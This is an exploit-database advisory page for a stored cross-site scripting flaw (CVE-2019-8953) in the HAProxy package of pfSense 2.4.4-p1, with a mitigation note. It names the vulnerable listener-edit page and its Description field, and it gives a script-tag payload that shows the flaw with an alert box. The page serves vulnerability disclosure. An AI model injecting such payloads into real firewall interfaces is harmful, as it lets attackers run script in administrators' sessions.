header-logo
Suggest Exploit
vendor:
pfSense
by:
Gionathan "John" Reale
6.1
CVSS
MEDIUM
Stored Cross-Site Scripting
79
CWE
Product Name: pfSense
Affected Version From: 2.4.4-p1
Affected Version To: 2.4.4-p1
Patch Exists: YES
Related CWE: CVE-2019-8953
CPE: a:pfsense:pfsense:2.4.4-p1
Metasploit:
Other Scripts:
Platforms Tested:
2019

pfSense 2.4.4-p1 (HAProxy Package 0.59_14) – Stored Cross-Site Scripting

Stored Cross-Site Scripting vulnerability in pfSense 2.4.4-p1 (HAProxy Package 0.59_14) allows an attacker to inject malicious scripts into a web page, which will be executed when other users view the page.

Mitigation:

Apply the official patch released by pfSense. Avoid using untrusted input in web pages without proper validation and sanitization.
Source

Exploit-DB raw data:

# Exploit Title: pfSense 2.4.4-p1 (HAProxy Package 0.59_14) - Stored Cross-Site Scripting 
# Date: 13.02.2019 
# Exploit Author: Gionathan "John" Reale 
# Vendor Homepage: https://www.pfsense.org 
# Version: 2.4.4-p1/0.59_14 
# Software Link: N/A
# Google Dork: N/A
# CVE:2019-8953 

################################################################################################################################## 
Introduction pfSense® software is a free, open source customized distribution of FreeBSD specifically tailored for use as a firewall and router that is entirely managed via web interface. 
In addition to being a powerful, flexible firewalling and routing platform, it includes a long list of related features and a package system allowing further expandability without adding bloat and potential security vulnerabilities to the base distribution. 
HAProxy is free, open source software that provides a high availability load balancer and proxy server for TCP and HTTP-based applications that spreads requests across multiple servers. 
################################################################################# 

Example: URL https://192.168.1.1/haproxy/haproxy_listeners_edit.php 
PARAMETER Description 
PAYLOAD "><script>alert("test")</script>